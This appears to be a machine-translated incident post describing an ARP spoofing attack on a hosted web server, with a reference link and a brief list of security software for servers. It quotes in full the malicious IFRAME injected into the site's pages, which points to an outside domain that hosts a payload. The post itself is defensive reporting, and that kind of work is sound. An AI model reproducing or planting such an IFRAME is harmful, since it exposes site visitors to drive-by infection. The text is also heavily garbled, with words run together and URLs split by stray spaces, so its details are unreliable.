Solutions to ARP attacks on servers

1.Attack Phenomenon

5Month16Day19:00Left and Right, get a message on the way home from work, the company's website access is abnormal, the exception is as follows

A)IE7Open all websitesHtmlThe page becomes a file download, and the website cannot be opened normally

B)IE7Do not useHttp1.1You can open the website, but the source file header is embedded1ItemsIFRAME

IFRAMEContent:<IFRAME src = http://xindizhi88.com/10.htm width = 20 Height = 0 frameborder = 0> </iframe>

GoogleBaidu finds that the server has receivedARPAttack

Http://www.google.cn/search? Sourceid = navclient & HL = ZH-CN & Ie = UTF-8 & rlz = 1t4gglj_zh-cn248cn249 & Q = % 22xindizhi88% 2 ECOM % 22

Http://www.baidu.com? WD = % 22xindizhi88% 2 ECOM % 22 & CL = 3

2.Attack Solution

A)InstallationARPFirewall software

I used it here.360Security guard and360arpFirewall. The effect is good, and the access is normal. At this time19:50.Whole spent50Minutes. We also foundARPAttack source.

B)FindARPAttack Source killing

Because it is a server hosting service, I will send the information I found here to the technical staff of the hosting equipment room.21:00Receive IDC notificationsARPThe attack source has been processed. The server is actually normal.

3.References

A)One rowCodeTemporary solutionIFRAMETrojan:Http://www.foloda.com.cn/BLOG/article.asp? Id = 70

4.QuiltARPReflection after attack

A)What kind of security software should I install on a general server?

I.Anti-Virus Software

II.DefenseDDoSAttack Software

III.DefenseARPAttack Software

IV.And...

You may give more comments.